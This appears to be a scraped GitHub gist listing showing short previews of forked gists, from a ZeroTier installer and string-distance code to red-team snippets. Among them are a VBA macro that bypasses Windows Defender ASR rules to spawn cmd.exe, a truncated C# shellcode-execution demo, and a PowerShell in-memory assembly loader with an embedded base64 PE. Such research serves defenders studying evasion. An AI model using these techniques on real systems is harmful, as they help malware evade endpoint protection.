Goals: Add links that are reasonable and good explanations of how stuff works. No hype and no vendor content if possible. Practical first-hand accounts and experience preferred (super rare at this point).
Jym Cheong jymcheong
jymcheong
/ InstallZeroTier.ps1
Created
December 31, 2023 10:12
— forked from wise-io/InstallZeroTier.ps1
Installs Latest ZeroTier One Client
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Installs ZeroTier | |
| .DESCRIPTION | |
| Install ZeroTier and join/configure ZeroTier network | |
| .EXAMPLE | |
| ./ios-InstallZeroTier.ps1 | |
| .NOTES | |
| This script will install PowerShell 7 if it is not present. | |
| A UAC prompt will appear during install if -UI is used. |
jymcheong
/ normcore-llm.md
Created
August 30, 2023 06:03
— forked from veekaybee/normcore-llm.md
Normcore LLM Reads
jymcheong
/ ASR Rules Bypass.vba
Created
November 4, 2021 08:01
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
jymcheong
/ EtwpTest.cs
Created
August 6, 2021 12:48
— forked from TheWover/EtwpTest.cs
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace EtwpTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
jymcheong
/ ReadingPortableExecutable_PE_header.cs
Created
April 20, 2021 06:51
— forked from augustoproiete/ReadingPortableExecutable_PE_header.cs
Reading the Portable Executable (PE) header in C#
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Credits: John Stewien | |
| // From: http://code.cheesydesign.com/?p=572 | |
| /* | |
| Reading the Portable Executable (PE) header in C# | |
| My job consists of writing fully custom applications for groups of people. The time pressure of these projects is quite high, so generally people start using the application while I’m still writing it, which means I write it modularly and add features as I go along. I also fix bugs as they are discovered. My clients are 2 tiered where expert users get a new build first, they test if for a while, and if they think it’s acceptable they then pass it on to others. | |
| This method of distribution is quite ad-hoc so when a client rings me up and asks me to view their screen to look at something, it’s useful to know what build they are running. To facillitate this I print the link date in the main Window Title so I instantly have an idea about how old the version is that I am looking at. This date is calculated at run time. To do this requires reading in the Portable Executable (PE) header from th |
jymcheong
/ jaro-winkler.js
Created
April 7, 2021 00:50
— forked from jordanthomas/jaro-winkler.js
The Jaro-Winkler distance metric in JavaScript. See also: https://github.com/jordanthomas/jaro-winkler
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var distance = function(s1, s2) { | |
| var m = 0; | |
| // Exit early if either are empty. | |
| if ( s1.length === 0 || s2.length === 0 ) { | |
| return 0; | |
| } | |
| // Exit early if they're an exact match. | |
| if ( s1 === s2 ) { |
jymcheong
/ secure-websockets
Created
July 26, 2019 13:17
— forked from casecode/secure-websockets
Basic Config for SSL with Secure Websockets using Nginx 1.6.0 + Puma + Thin
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ========================= | |
| # /etc/nginx/nginx.conf | |
| ========================= | |
| user www-data; | |
| worker_processes 4; | |
| pid /var/run/nginx.pid; | |
| events { | |
| worker_connections 768; |
jymcheong
/ LoadInMemoryModule.ps1
Created
May 31, 2019 11:08
— forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
jymcheong
/ Invoke-RestMethod with cookie and header.ps1
Created
March 31, 2019 09:22
— forked from JohnRoos/Invoke-RestMethod with cookie and header.ps1
Invoke-RestMethod with cookies and headers
jymcheong
/ GetPEFeature.ps1
Created
February 5, 2019 09:16
— forked from mattifestation/GetPEFeature.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Get-PEFeature { | |
| <# | |
| .SYNOPSIS | |
| Retrieves key features from PE files that can be used to build detections. | |
| .DESCRIPTION | |
| Get-PEFeature extracts key features of PE files that are relevant to building detections. |
NewerOlder